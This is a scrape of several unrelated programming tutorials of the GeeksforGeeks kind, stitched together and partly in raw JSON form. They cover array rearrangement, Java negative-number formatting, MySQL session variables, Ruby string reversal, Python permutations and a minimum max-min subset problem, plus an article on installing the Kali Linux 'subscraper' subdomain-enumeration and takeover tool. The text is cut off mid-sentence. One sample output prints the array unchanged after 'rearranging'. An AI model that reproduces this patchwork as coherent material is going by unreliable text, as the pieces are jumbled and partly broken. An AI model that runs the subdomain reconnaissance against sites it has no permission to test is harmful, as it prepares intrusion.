first // element in each recursive call rearrange(array, (start + 1), end); // If the first element of the array is positive, // then right-rotate the array by one place first // and then reverse the merged array. if(array[start] >= 0) { reverse(array, (start + 1), end); reverse(array, start, end); }} // Driver codeint main(){ int array[] = {-12, -11, -13, -5, -6, 7, 5, 3, 6}; int length = (sizeof(array) / sizeof(array[0])); int countNegative = 0; for(int i = 0; i < length; i++) { if(array[i] < 0) countNegative++; } std::cout << \"array: \"; printArray(array, length); rearrange(array, 0, (length - 1)); reverse(array, countNegative, (length - 1)); std::cout << \"rearranged array: \"; printArray(array, length); return 0;}", "e": 30724, "s": 28954, "text": null }, { "code": "// Java program to implement the// above approachimport java.io.*;class GFG{ static void printArray(int[] array, int length){ System.out.print(\"[\"); for (int i = 0; i < length; i++) { System.out.print(array[i]); if (i < (length - 1)) System.out.print(\",\"); else System.out.print(\"]\\n\"); }} static void reverse(int[] array, int start, int end){ while (start < end) { int temp = array[start]; array[start] = array[end]; array[end] = temp; start++; end--; }} // Rearrange the array with// all negative integers on left// and positive integers on right// use recursion to split the// array with first element// as one half and the rest// array as another and then// merge it with head of// the array in each stepstatic void rearrange(int[] array, int start, int end){ // exit condition if (start == end) return; // rearrange the array // except the first element // in each recursive call rearrange(array, (start + 1), end); // If the first element of // the array is positive, // then right-rotate the // array by one place first // and then reverse the merged array. if (array[start] >= 0) { reverse(array, (start + 1), end); reverse(array, start, end); }} // Driver codepublic static void main(String[] args){ int[] array = {-12, -11, -13, -5, -6, 7, 5, 3, 6}; int length = array.length; int countNegative = 0; for (int i = 0; i < length; i++) { if (array[i] < 0) countNegative++; } System.out.print(\"array: \"); printArray(array, length); rearrange(array, 0, (length - 1)); reverse(array, countNegative, (length - 1)); System.out.print(\"rearranged array: \"); printArray(array, length);}} // This code is contributed by Chitranayal", "e": 32592, "s": 30724, "text": null }, { "code": "# Python3 implementation of the above approachdef printArray(array, length): print(\"[\", end = \"\") for i in range(length): print(array[i], end = \"\") if(i < (length - 1)): print(\",\", end = \" \") else: print(\"]\") def reverse(array, start, end): while(start < end): temp = array[start] array[start] = array[end] array[end] = temp start += 1 end -= 1 # Rearrange the array with all negative integers# on left and positive integers on right# use recursion to split the array with first element# as one half and the rest array as another and then# merge it with head of the array in each stepdef rearrange(array, start, end): # exit condition if(start == end): return # rearrange the array except the first # element in each recursive call rearrange(array, (start + 1), end) # If the first element of the array is positive, # then right-rotate the array by one place first # and then reverse the merged array. if(array[start] >= 0): reverse(array, (start + 1), end) reverse(array, start, end) # Driver codeif __name__ == '__main__': array = [-12, -11, -13, -5, -6, 7, 5, 3, 6] length = len(array) countNegative = 0 for i in range(length): if(array[i] < 0): countNegative += 1 print(\"array: \", end = \"\") printArray(array, length) rearrange(array, 0, (length - 1)) reverse(array, countNegative, (length - 1)) print(\"rearranged array: \", end = \"\") printArray(array, length) # This code is contributed by mohit kumar 29", "e": 34196, "s": 32592, "text": null }, { "code": "// C# implementation of// the above approachusing System;class GFG{ static void printArray(int []array, int length){ Console.Write(\"[\"); for(int i = 0; i < length; i++) { Console.Write(array[i]); if(i < (length - 1)) Console.Write(\",\"); else Console.Write(\"]\\n\"); }} static void reverse(int []array, int start, int end){ while(start < end) { int temp = array[start]; array[start] = array[end]; array[end] = temp; start++; end--; }} // Rearrange the array with// all negative integers on left// and positive integers on right// use recursion to split the// array with first element// as one half and the rest// array as another and then// merge it with head of// the array in each step static void rearrange(int []array, int start, int end){ // exit condition if(start == end) return; // rearrange the array // except the first element // in each recursive call rearrange(array, (start + 1), end); // If the first element of // the array is positive, // then right-rotate the // array by one place first // and then reverse the merged array. if(array[start] >= 0) { reverse(array, (start + 1), end); reverse(array, start, end); }} // Driver codepublic static void Main(string[] args){ int []array = {-12, -11, -13, -5, -6, 7, 5, 3, 6}; int length = array.Length; int countNegative = 0; for(int i = 0; i < length; i++) { if(array[i] < 0) countNegative++; } Console.Write(\"array: \"); printArray(array, length); rearrange(array, 0, (length - 1)); reverse(array, countNegative, (length - 1)); Console.Write(\"rearranged array: \"); printArray(array, length);}} // This code is contributed by Rutvik_56", "e": 35980, "s": 34196, "text": null }, { "code": "<script>// Javascript program to implement the// above approachfunction printArray(array, Length){ document.write(\"[\"); for (let i = 0; i < Length; i++) { document.write(array[i]); if (i < (Length - 1)) document.write(\",\"); else document.write(\"]<br>\"); }} function reverse(array,start,end){ while (start < end) { let temp = array[start]; array[start] = array[end]; array[end] = temp; start++; end--; }} // Rearrange the array with// all negative integers on left// and positive integers on right// use recursion to split the// array with first element// as one half and the rest// array as another and then// merge it with head of// the array in each stepfunction rearrange(array,start,end){ // exit condition if (start == end) return; // rearrange the array // except the first element // in each recursive call rearrange(array, (start + 1), end); // If the first element of // the array is positive, // then right-rotate the // array by one place first // and then reverse the merged array. if (array[start] >= 0) { reverse(array, (start + 1), end); reverse(array, start, end); }} // Driver codelet array = [-12, -11, -13, -5, -6, 7, 5, 3, 6];let length = array.length;let countNegative = 0;for (let i = 0; i < length; i++) { if (array[i] < 0) countNegative++; } document.write(\"array: \"); printArray(array, length); rearrange(array, 0, (length - 1)); reverse(array, countNegative, (length - 1)); document.write(\"rearranged array: \"); printArray(array, length); // This code is contributed by rag2127.</script>", "e": 37633, "s": 35980, "text": null }, { "code": null, "e": 37730, "s": 37633, "text": "array: [-12, -11, -13, -5, -6, 7, 5, 3, 6]\nrearranged array: [-12, -11, -13, -5, -6, 7, 5, 3, 6]" }, { "code": null, "e": 38178, "s": 37732, "text": "Time complexity: O(N^2)This article is contributed by abhijeet kaurav. If you like GeeksforGeeks and would like to contribute, you can also write an article using write.geeksforgeeks.org or mail your article to [email protected]. See your article appearing on the GeeksforGeeks main page and help other Geeks.Please write comments if you find anything incorrect, or you want to share more information about the topic discussed above." }, { "code": null, "e": 38194, "s": 38178, "text": "array-rearrange" }, { "code": null, "e": 38198, "s": 38194, "text": "STL" }, { "code": null, "e": 38205, "s": 38198, "text": "Arrays" }, { "code": null, "e": 38213, "s": 38205, "text": "Sorting" }, { "code": null, "e": 38220, "s": 38213, "text": "Arrays" }, { "code": null, "e": 38228, "s": 38220, "text": "Sorting" }, { "code": null, "e": 38232, "s": 38228, "text": "STL" }, { "code": null, "e": 38330, "s": 38232, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 38339, "s": 38330, "text": "Comments" }, { "code": null, "e": 38352, "s": 38339, "text": "Old Comments" }, { "code": null, "e": 38375, "s": 38352, "text": "Introduction to Arrays" }, { "code": null, "e": 38396, "s": 38375, "text": "Linked List vs Array" }, { "code": null, "e": 38441, "s": 38396, "text": "Python | Using 2D arrays/lists the right way" }, { "code": null, "e": 38495, "s": 38441, "text": "Queue | Set 1 (Introduction and Array Implementation)" } ]
Formatting a Negative Number Output with Parentheses in Java
A negative number output can be shown using the Formatter object − Formatter f = new Formatter(); f.format("%12.2f", -7.598); System.out.println(f); Try the below given code to format a Negative Number Output with Parentheses − Formatter f = new Formatter(); f.format("%(d", -50); System.out.println(f); The following is an example − Live Demo import java.util.Formatter; public class Demo { public static void main(String args[]) { Formatter f = new Formatter(); f.format("% d", 50); System.out.println(f); // negative number inside parentheses f = new Formatter(); f.format("%(d", -50); System.out.println(f); } } 50 (50)
[ { "code": null, "e": 1129, "s": 1062, "text": "A negative number output can be shown using the Formatter object −" }, { "code": null, "e": 1211, "s": 1129, "text": "Formatter f = new Formatter();\nf.format(\"%12.2f\", -7.598);\nSystem.out.println(f);" }, { "code": null, "e": 1290, "s": 1211, "text": "Try the below given code to format a Negative Number Output with Parentheses −" }, { "code": null, "e": 1366, "s": 1290, "text": "Formatter f = new Formatter();\nf.format(\"%(d\", -50);\nSystem.out.println(f);" }, { "code": null, "e": 1396, "s": 1366, "text": "The following is an example −" }, { "code": null, "e": 1407, "s": 1396, "text": " Live Demo" }, { "code": null, "e": 1727, "s": 1407, "text": "import java.util.Formatter;\npublic class Demo {\n public static void main(String args[]) {\n Formatter f = new Formatter();\n f.format(\"% d\", 50);\n System.out.println(f);\n // negative number inside parentheses\n f = new Formatter();\n f.format(\"%(d\", -50);\n System.out.println(f);\n }\n}" }, { "code": null, "e": 1735, "s": 1727, "text": "50\n(50)" } ]
What is the usage of “@” symbol in MySQL stored procedure?
The @ symbol in a stored procedure can be used for user-defined session variables. Let us first create a table − mysql> create table DemoTable ( StudentName varchar(50) ); Query OK, 0 rows affected (1.30 sec) Insert some records in the table using insert command − mysql> insert into DemoTable values('John Smith'); Query OK, 1 row affected (1.00 sec) mysql> insert into DemoTable values('John Doe'); Query OK, 1 row affected (0.19 sec) mysql> insert into DemoTable values('Chris Brown'); Query OK, 1 row affected (0.53 sec) Display all records from the table using select statement − mysql> select *from DemoTable; This will produce the following output − +-------------+ | StudentName | +-------------+ | John Smith | | John Doe | | Chris Brown | +-------------+ 3 rows in set (0.00 sec) Let us now create a stored procedure to calculate the number of records from DemoTable − mysql> DELIMITER // mysql> create procedure `Demo_Of_@Symbol`() BEGIN select count(*) into @numberOfRecords from DemoTable; END // Query OK, 0 rows affected (0.33 sec) mysql> DELIMITER ; Following is the query to call the stored procedure using CALL command − mysql> call `Demo_Of_@Symbol`(); Query OK, 1 row affected (0.00 sec) Let us now see the usage of the @symbol − mysql> select @numberOfRecords; This will produce the following output − +------------------+ | @numberOfRecords | +------------------+ | 3 | +------------------+ 1 row in set (0.00 sec)
[ { "code": null, "e": 1175, "s": 1062, "text": "The @ symbol in a stored procedure can be used for user-defined session variables. Let us first create a table −" }, { "code": null, "e": 1274, "s": 1175, "text": "mysql> create table DemoTable\n(\n StudentName varchar(50)\n);\nQuery OK, 0 rows affected (1.30 sec)" }, { "code": null, "e": 1330, "s": 1274, "text": "Insert some records in the table using insert command −" }, { "code": null, "e": 1590, "s": 1330, "text": "mysql> insert into DemoTable values('John Smith');\nQuery OK, 1 row affected (1.00 sec)\nmysql> insert into DemoTable values('John Doe');\nQuery OK, 1 row affected (0.19 sec)\nmysql> insert into DemoTable values('Chris Brown');\nQuery OK, 1 row affected (0.53 sec)" }, { "code": null, "e": 1650, "s": 1590, "text": "Display all records from the table using select statement −" }, { "code": null, "e": 1681, "s": 1650, "text": "mysql> select *from DemoTable;" }, { "code": null, "e": 1722, "s": 1681, "text": "This will produce the following output −" }, { "code": null, "e": 1859, "s": 1722, "text": "+-------------+\n| StudentName |\n+-------------+\n| John Smith |\n| John Doe |\n| Chris Brown |\n+-------------+\n3 rows in set (0.00 sec)" }, { "code": null, "e": 1948, "s": 1859, "text": "Let us now create a stored procedure to calculate the number of records from DemoTable −" }, { "code": null, "e": 2144, "s": 1948, "text": "mysql> DELIMITER //\nmysql> create procedure `Demo_Of_@Symbol`()\n BEGIN\n select count(*) into @numberOfRecords from DemoTable;\n END\n//\nQuery OK, 0 rows affected (0.33 sec)\nmysql> DELIMITER ;" }, { "code": null, "e": 2217, "s": 2144, "text": "Following is the query to call the stored procedure using CALL command −" }, { "code": null, "e": 2286, "s": 2217, "text": "mysql> call `Demo_Of_@Symbol`();\nQuery OK, 1 row affected (0.00 sec)" }, { "code": null, "e": 2328, "s": 2286, "text": "Let us now see the usage of the @symbol −" }, { "code": null, "e": 2360, "s": 2328, "text": "mysql> select @numberOfRecords;" }, { "code": null, "e": 2401, "s": 2360, "text": "This will produce the following output −" }, { "code": null, "e": 2530, "s": 2401, "text": "+------------------+\n| @numberOfRecords |\n+------------------+\n| 3 |\n+------------------+\n1 row in set (0.00 sec)" } ]
Subscraper – Subdomain enumeration tool in Kali Linux
28 Jul, 2021 Subscraper is a free and open-source tool available on GitHub. Subscraper is used for reconnaissance of subdomains. subscraper is used for finding the subdomain of the target website. This tool is used to find subdomains from a website/web application. Usually, what happens is that it become very difficult for a security researcher to find subdomains from an HTTPS website or web application. This tool helps to get subdomains of all HTTPS as well as HTTP websites. subscraper tool is written in Python you must have python installed into your Kali Linux in order to use this tool. This tool comes with an awesome user interface. The user interface of the tool is very similar to Metasploitable 1 and metasploitable 2 which makes it very easy to run and use. Subscraper is a free and open-source tool available on GitHub. Subscraper tool is used for reconnaissance of subdomains of websites/web applications. Subscraper tool is used for information gathering. Subscraper tool is used to find subdomains of the target. Step 1: First you have to install the tool using the following command in your kali Linux operating system. Then you have to move to the directory of the tool. git clone https://github.com/m8r0wn/subscraper cd subscraper Step 2: The tool has been downloaded successfully now you have to install the tool using the following command. python3 setup.py install The tool has been installed successfully in your system now we will see some examples to use the tool. Example 1: Use subscraper tool to find the subdomain of a website. subscraper <domain > once the scanning is completed, use the following command to perform Subdomain Takeover. subscraper --takeover subscraper_report.txt Now to view the report use the following command. ls nano subscraper_report.txt This is the subdomain takeover report of the tool. You can see that we have found all the subdomains of domain geeksforgeeks.org. Similarly, you can find all the subdomains of any domain. This tool helps security researchers in the initial phases of reconnaissance and security scanning of the website and web applications. Example 2: Use subscraper tool to find the subdomain of a website by changing the enumeration level of scanning. subscraper -e 3 <domain> Kali-Linux linux Linux-Tools Linux-Unix Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here.
[ { "code": null, "e": 28, "s": 0, "text": "\n28 Jul, 2021" }, { "code": null, "e": 790, "s": 28, "text": "Subscraper is a free and open-source tool available on GitHub. Subscraper is used for reconnaissance of subdomains. subscraper is used for finding the subdomain of the target website. This tool is used to find subdomains from a website/web application. Usually, what happens is that it become very difficult for a security researcher to find subdomains from an HTTPS website or web application. This tool helps to get subdomains of all HTTPS as well as HTTP websites. subscraper tool is written in Python you must have python installed into your Kali Linux in order to use this tool. This tool comes with an awesome user interface. The user interface of the tool is very similar to Metasploitable 1 and metasploitable 2 which makes it very easy to run and use." }, { "code": null, "e": 853, "s": 790, "text": "Subscraper is a free and open-source tool available on GitHub." }, { "code": null, "e": 940, "s": 853, "text": "Subscraper tool is used for reconnaissance of subdomains of websites/web applications." }, { "code": null, "e": 991, "s": 940, "text": "Subscraper tool is used for information gathering." }, { "code": null, "e": 1049, "s": 991, "text": "Subscraper tool is used to find subdomains of the target." }, { "code": null, "e": 1209, "s": 1049, "text": "Step 1: First you have to install the tool using the following command in your kali Linux operating system. Then you have to move to the directory of the tool." }, { "code": null, "e": 1270, "s": 1209, "text": "git clone https://github.com/m8r0wn/subscraper\ncd subscraper" }, { "code": null, "e": 1382, "s": 1270, "text": "Step 2: The tool has been downloaded successfully now you have to install the tool using the following command." }, { "code": null, "e": 1407, "s": 1382, "text": "python3 setup.py install" }, { "code": null, "e": 1511, "s": 1407, "text": " The tool has been installed successfully in your system now we will see some examples to use the tool." }, { "code": null, "e": 1578, "s": 1511, "text": "Example 1: Use subscraper tool to find the subdomain of a website." }, { "code": null, "e": 1599, "s": 1578, "text": "subscraper <domain >" }, { "code": null, "e": 1688, "s": 1599, "text": "once the scanning is completed, use the following command to perform Subdomain Takeover." }, { "code": null, "e": 1732, "s": 1688, "text": "subscraper --takeover subscraper_report.txt" }, { "code": null, "e": 1782, "s": 1732, "text": "Now to view the report use the following command." }, { "code": null, "e": 1812, "s": 1782, "text": "ls\nnano subscraper_report.txt" }, { "code": null, "e": 2137, "s": 1812, "text": "This is the subdomain takeover report of the tool. You can see that we have found all the subdomains of domain geeksforgeeks.org. Similarly, you can find all the subdomains of any domain. This tool helps security researchers in the initial phases of reconnaissance and security scanning of the website and web applications. " }, { "code": null, "e": 2250, "s": 2137, "text": "Example 2: Use subscraper tool to find the subdomain of a website by changing the enumeration level of scanning." }, { "code": null, "e": 2275, "s": 2250, "text": "subscraper -e 3 <domain>" }, { "code": null, "e": 2286, "s": 2275, "text": "Kali-Linux" }, { "code": null, "e": 2292, "s": 2286, "text": "linux" }, { "code": null, "e": 2304, "s": 2292, "text": "Linux-Tools" }, { "code": null, "e": 2315, "s": 2304, "text": "Linux-Unix" } ]
Ruby | String reverse Method
08 Jan, 2020 reverse is a String class method in Ruby which is used to return a new string with the characters from the given string in reverse order. Syntax: str.reverse Parameters: Here, str is the string which is to be reversed. Returns: This method returns a new string in reversed order. Example 1: # Ruby program to demonstrate# the reverse method # Taking a string and# using the methodputs "GeeksforGeeks".reverseputs "Ruby".reverse Output: skeeGrofskeeG ybuR Example 2: # Ruby program to demonstrate# the reverse method # Taking a string and# using the methodputs "String".reverseputs "Class".reverse Output: gnirtS ssalC Ruby String-class Ruby-Methods Ruby Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here.
[ { "code": null, "e": 28, "s": 0, "text": "\n08 Jan, 2020" }, { "code": null, "e": 166, "s": 28, "text": "reverse is a String class method in Ruby which is used to return a new string with the characters from the given string in reverse order." }, { "code": null, "e": 186, "s": 166, "text": "Syntax: str.reverse" }, { "code": null, "e": 247, "s": 186, "text": "Parameters: Here, str is the string which is to be reversed." }, { "code": null, "e": 308, "s": 247, "text": "Returns: This method returns a new string in reversed order." }, { "code": null, "e": 319, "s": 308, "text": "Example 1:" }, { "code": "# Ruby program to demonstrate# the reverse method # Taking a string and# using the methodputs \"GeeksforGeeks\".reverseputs \"Ruby\".reverse", "e": 458, "s": 319, "text": null }, { "code": null, "e": 466, "s": 458, "text": "Output:" }, { "code": null, "e": 486, "s": 466, "text": "skeeGrofskeeG\nybuR\n" }, { "code": null, "e": 497, "s": 486, "text": "Example 2:" }, { "code": "# Ruby program to demonstrate# the reverse method # Taking a string and# using the methodputs \"String\".reverseputs \"Class\".reverse", "e": 630, "s": 497, "text": null }, { "code": null, "e": 638, "s": 630, "text": "Output:" }, { "code": null, "e": 652, "s": 638, "text": "gnirtS\nssalC\n" }, { "code": null, "e": 670, "s": 652, "text": "Ruby String-class" }, { "code": null, "e": 683, "s": 670, "text": "Ruby-Methods" }, { "code": null, "e": 688, "s": 683, "text": "Ruby" } ]
Generate all permutation of a set in Python
21 Jan, 2022 Permutation is an arrangement of objects in a specific order. Order of arrangement of object is very important. The number of permutations on a set of n elements is given by n!. For example, there are 2! = 2*1 = 2 permutations of {1, 2}, namely {1, 2} and {2, 1}, and 3! = 3*2*1 = 6 permutations of {1, 2, 3}, namely {1, 2, 3}, {1, 3, 2}, {2, 1, 3}, {2, 3, 1}, {3, 1, 2} and {3, 2, 1}. Method 1 (Backtracking) We can use the backtracking based recursive solution discussed here.Method 2 The idea is to one by one extract all elements, place them at first position and recur for remaining list. Python3 # Python function to print permutations of a given listdef permutation(lst): # If lst is empty then there are no permutations if len(lst) == 0: return [] # If there is only one element in lst then, only # one permutation is possible if len(lst) == 1: return [lst] # Find the permutations for lst if there are # more than 1 characters l = [] # empty list that will store current permutation # Iterate the input(lst) and calculate the permutation for i in range(len(lst)): m = lst[i] # Extract lst[i] or m from the list. remLst is # remaining list remLst = lst[:i] + lst[i+1:] # Generating all permutations where m is first # element for p in permutation(remLst): l.append([m] + p) return l # Driver program to test above functiondata = list('123')for p in permutation(data): print (p) Output: ['1', '2', '3'] ['1', '3', '2'] ['2', '1', '3'] ['2', '3', '1'] ['3', '1', '2'] ['3', '2', '1'] Method 3 (Direct Function) We can do it by simply using the built-in permutation function in itertools library. It is the shortest technique to find the permutation. Python3 from itertools import permutationsl = list(permutations(range(1, 4)))print(l) Output: [(1, 2, 3), (1, 3, 2), (2, 1, 3), (2, 3, 1), (3, 1, 2), (3, 2, 1)] This article is contributed by Arpit Agarwal. If you like GeeksforGeeks and would like to contribute, you can also write an article and mail your article to [email protected]. See your article appearing on the GeeksforGeeks main page and help other Geeks.Please write comments if you find anything incorrect, or you want to share more information about the topic discussed above anikaseth98 amartyaghoshgfg permutation Algorithms Mathematical Python Mathematical permutation Algorithms Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here.
[ { "code": null, "e": 52, "s": 24, "text": "\n21 Jan, 2022" }, { "code": null, "e": 441, "s": 52, "text": "Permutation is an arrangement of objects in a specific order. Order of arrangement of object is very important. The number of permutations on a set of n elements is given by n!. For example, there are 2! = 2*1 = 2 permutations of {1, 2}, namely {1, 2} and {2, 1}, and 3! = 3*2*1 = 6 permutations of {1, 2, 3}, namely {1, 2, 3}, {1, 3, 2}, {2, 1, 3}, {2, 3, 1}, {3, 1, 2} and {3, 2, 1}. " }, { "code": null, "e": 650, "s": 441, "text": "Method 1 (Backtracking) We can use the backtracking based recursive solution discussed here.Method 2 The idea is to one by one extract all elements, place them at first position and recur for remaining list. " }, { "code": null, "e": 658, "s": 650, "text": "Python3" }, { "code": "# Python function to print permutations of a given listdef permutation(lst): # If lst is empty then there are no permutations if len(lst) == 0: return [] # If there is only one element in lst then, only # one permutation is possible if len(lst) == 1: return [lst] # Find the permutations for lst if there are # more than 1 characters l = [] # empty list that will store current permutation # Iterate the input(lst) and calculate the permutation for i in range(len(lst)): m = lst[i] # Extract lst[i] or m from the list. remLst is # remaining list remLst = lst[:i] + lst[i+1:] # Generating all permutations where m is first # element for p in permutation(remLst): l.append([m] + p) return l # Driver program to test above functiondata = list('123')for p in permutation(data): print (p)", "e": 1553, "s": 658, "text": null }, { "code": null, "e": 1561, "s": 1553, "text": "Output:" }, { "code": null, "e": 1657, "s": 1561, "text": "['1', '2', '3']\n['1', '3', '2']\n['2', '1', '3']\n['2', '3', '1']\n['3', '1', '2']\n['3', '2', '1']" }, { "code": null, "e": 1824, "s": 1657, "text": "Method 3 (Direct Function) We can do it by simply using the built-in permutation function in itertools library. It is the shortest technique to find the permutation. " }, { "code": null, "e": 1832, "s": 1824, "text": "Python3" }, { "code": "from itertools import permutationsl = list(permutations(range(1, 4)))print(l)", "e": 1910, "s": 1832, "text": null }, { "code": null, "e": 1918, "s": 1910, "text": "Output:" }, { "code": null, "e": 1986, "s": 1918, "text": "[(1, 2, 3), (1, 3, 2), (2, 1, 3), (2, 3, 1), (3, 1, 2), (3, 2, 1)] " }, { "code": null, "e": 2378, "s": 1986, "text": "This article is contributed by Arpit Agarwal. If you like GeeksforGeeks and would like to contribute, you can also write an article and mail your article to [email protected]. See your article appearing on the GeeksforGeeks main page and help other Geeks.Please write comments if you find anything incorrect, or you want to share more information about the topic discussed above " }, { "code": null, "e": 2390, "s": 2378, "text": "anikaseth98" }, { "code": null, "e": 2406, "s": 2390, "text": "amartyaghoshgfg" }, { "code": null, "e": 2418, "s": 2406, "text": "permutation" }, { "code": null, "e": 2429, "s": 2418, "text": "Algorithms" }, { "code": null, "e": 2442, "s": 2429, "text": "Mathematical" }, { "code": null, "e": 2449, "s": 2442, "text": "Python" }, { "code": null, "e": 2462, "s": 2449, "text": "Mathematical" }, { "code": null, "e": 2474, "s": 2462, "text": "permutation" }, { "code": null, "e": 2485, "s": 2474, "text": "Algorithms" } ]
Minimum difference between max and min of all K-size subsets
08 Jul, 2022 Given an array of integer values, we need to find the minimum difference between maximum and minimum of all possible K-length subsets. Examples : Input : arr[] = [3, 5, 100, 101, 102] K = 3 Output : 2 Explanation : Possible subsets of K-length with their differences are, [3 5 100] max min diff is (100 - 3) = 97 [3 5 101] max min diff is (101 - 3) = 98 [3 5 102] max min diff is (102 - 3) = 99 [3 100 101] max min diff is (101 - 3) = 98 [3 100 102] max min diff is (102 - 3) = 99 [3 101 102] max min diff is (102 - 3) = 98 [5 100 101] max min diff is (101 - 5) = 96 [5 100 102] max min diff is (102 - 5) = 97 [5 101 102] max min diff is (102 - 5) = 97 [100 101 102] max min diff is (102 - 100) = 2 As the minimum difference is 2, it should be the answer for given array. Input : arr[] = {5, 1, 10, 6} k = 2 Output : 1 We get the above result considering subset {5, 6} We can solve this problem without iterating over all possible subsets by observing the fact that our result subset will always be consecutive, once we sort the given array. The reason is sorting brings value-wise close elements together. We can prove above fact as follows – Suppose we chose number a1, a2, a3 ... aK which are in increasing order but not continuous, then our difference will be (aK – a1) but if we include the number which was not taken earlier (let aR) then our K length subset will be a2, a3, ... aR, .... aK. In this case, our difference will (aK – a2) which must be smaller than (aK – a1) because a2 > a1. So we can say that the subset which will contain our answer will always be consecutive in sorted array. Starting above fact, for solving the problem first we sort the array then we will iterate over first (N – K) elements and each time we will take the difference between elements which are K distant apart and our final answer will be minimum of them. Implementation: C++ Java Python3 C# PHP Javascript // C++ program to find minimum difference// between max and min of all subset of K size#include <bits/stdc++.h> using namespace std; // returns min difference between max// and min of any K-size subsetint minDifferenceAmongMaxMin(int arr[], int N, int K){ // sort the array so that close // elements come together. sort(arr, arr + N); // initialize result by a big integer number int res = INT_MAX; // loop over first (N - K) elements // of the array only for (int i = 0; i <= (N - K); i++) { // get difference between max and // min of current K-sized segment int curSeqDiff = arr[i + K - 1] - arr[i]; res = min(res, curSeqDiff); } return res;} // Driver codeint main() { int arr[] = {10, 20, 30, 100, 101, 102}; int N = sizeof(arr) / sizeof(arr[0]); int K = 3; cout << minDifferenceAmongMaxMin(arr, N, K); return 0; } // Java program to find minimum difference// between max and min of all subset of// K sizeimport java.util.Arrays; class GFG{ // returns min difference between max // and min of any K-size subset static int minDifferenceAmongMaxMin(int arr[], int N, int K) { // sort the array so that close // elements come together. Arrays.sort(arr); // initialize result by // a big integer number int res = 2147483647; // loop over first (N - K) elements // of the array only for (int i = 0; i <= (N - K); i++) { // get difference between max and // min of current K-sized segment int curSeqDiff = arr[i + K - 1] - arr[i]; res = Math.min(res, curSeqDiff); } return res; } // Driver code public static void main(String[] args) { int arr[] = {10, 20, 30, 100, 101, 102}; int N = arr.length; int K = 3; System.out.print( minDifferenceAmongMaxMin(arr, N, K)); }} // This code is contributed by Anant Agarwal. # Python3 program to find minimum# difference between max and min# of all subset of K size # Returns min difference between max# and min of any K-size subsetdef minDifferenceAmongMaxMin(arr, N, K): # sort the array so that close # elements come together. arr.sort() # initialize result by a # big integer number res = 2147483647 # loop over first (N - K) elements # of the array only for i in range((N - K) + 1): # get difference between max and min # of current K-sized segment curSeqDiff = arr[i + K - 1] - arr[i] res = min(res, curSeqDiff) return res # Driver Codearr = [10, 20, 30, 100, 101, 102]N = len(arr)K = 3print(minDifferenceAmongMaxMin(arr, N, K)) # This code is contributed by Anant Agarwal. // C# program to find minimum difference// between max and min of all subset of// K sizeusing System; class GFG{ // returns min difference between max // and min of any K-size subset static int minDifferenceAmongMaxMin(int []arr, int N, int K) { // sort the array so that close // elements come together. Array.Sort(arr); // initialize result by // a big integer number int res = 2147483647; // loop over first (N - K) elements // of the array only for (int i = 0; i <= (N - K); i++) { // get difference between max and // min of current K-sized segment int curSeqDiff = arr[i + K - 1] - arr[i]; res = Math.Min(res, curSeqDiff); } return res; } // Driver code public static void Main() { int []arr= {10, 20, 30, 100, 101, 102}; int N = arr.Length; int K = 3; Console.Write( minDifferenceAmongMaxMin(arr, N, K)); }} // This code is contributed by nitin mittal <?php// PHP program to find minimum difference// between max and min of all subset// of K size // returns min difference between max// and min of any K-size subsetfunction minDifferenceAmongMaxMin($arr, $N, $K){ $INT_MAX = 2; // sort the array so that close // elements come together. sort($arr); sort($arr , $N); // initialize result by a // big integer number $res = $INT_MAX; // loop over first (N - K) elements // of the array only for ($i = 0; $i <= ($N - $K); $i++) { // get difference between max and // min of current K-sized segment $curSeqDiff = $arr[$i + $K - 1] - $arr[$i]; $res = min($res, $curSeqDiff); } return $res;} // Driver Code $arr = array(10, 20, 30, 100, 101, 102); $N = sizeof($arr); $K = 3; echo minDifferenceAmongMaxMin($arr, $N, $K); // This code is contributed by Nitin Mittal.?> <script> // JavaScript program to find minimum difference// between max and min of all subset of// K size // returns min difference between max // and min of any K-size subset function minDifferenceAmongMaxMin(arr, N, K) { // sort the array so that close // elements come together. arr.sort((a, b) => a - b); // initialize result by // a big integer number let res = 2147483647; // loop over first (N - K) elements // of the array only for (let i = 0; i <= (N - K); i++) { // get difference between max and // min of current K-sized segment let curSeqDiff = arr[i + K - 1] - arr[i]; res = Math.min(res, curSeqDiff); } return res; } // Driver Code let arr = [10, 20, 30, 100, 101, 102]; let N = arr.length; let K = 3; document.write( minDifferenceAmongMaxMin(arr, N, K)); </script> 2 Time Complexity: O(n Log n) This article is contributed by Utkarsh Trivedi. If you like GeeksforGeeks and would like to contribute, you can also write an article using write.geeksforgeeks.org or mail your article to [email protected]. See your article appearing on the GeeksforGeeks main page and help other Geeks. nitin mittal sanjoy_62 rajeev0719singh simranarora5sos hardikkoriintern subset Arrays Sorting Arrays Sorting subset Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here.
[ { "code": null, "e": 52, "s": 24, "text": "\n08 Jul, 2022" }, { "code": null, "e": 187, "s": 52, "text": "Given an array of integer values, we need to find the minimum difference between maximum and minimum of all possible K-length subsets." }, { "code": null, "e": 199, "s": 187, "text": "Examples : " }, { "code": null, "e": 951, "s": 199, "text": "Input : arr[] = [3, 5, 100, 101, 102]\n K = 3\nOutput : 2\n\nExplanation : Possible subsets of K-length with\ntheir differences are,\n[3 5 100] max min diff is (100 - 3) = 97\n[3 5 101] max min diff is (101 - 3) = 98\n[3 5 102] max min diff is (102 - 3) = 99\n[3 100 101] max min diff is (101 - 3) = 98\n[3 100 102] max min diff is (102 - 3) = 99\n[3 101 102] max min diff is (102 - 3) = 98\n[5 100 101] max min diff is (101 - 5) = 96\n[5 100 102] max min diff is (102 - 5) = 97\n[5 101 102] max min diff is (102 - 5) = 97\n[100 101 102] max min diff is (102 - 100) = 2\nAs the minimum difference is 2, it should \nbe the answer for given array.\n\nInput : arr[] = {5, 1, 10, 6}\n k = 2\nOutput : 1\n\nWe get the above result considering subset\n{5, 6}" }, { "code": null, "e": 1190, "s": 951, "text": "We can solve this problem without iterating over all possible subsets by observing the fact that our result subset will always be consecutive, once we sort the given array. The reason is sorting brings value-wise close elements together. " }, { "code": null, "e": 1684, "s": 1190, "text": "We can prove above fact as follows – Suppose we chose number a1, a2, a3 ... aK which are in increasing order but not continuous, then our difference will be (aK – a1) but if we include the number which was not taken earlier (let aR) then our K length subset will be a2, a3, ... aR, .... aK. In this case, our difference will (aK – a2) which must be smaller than (aK – a1) because a2 > a1. So we can say that the subset 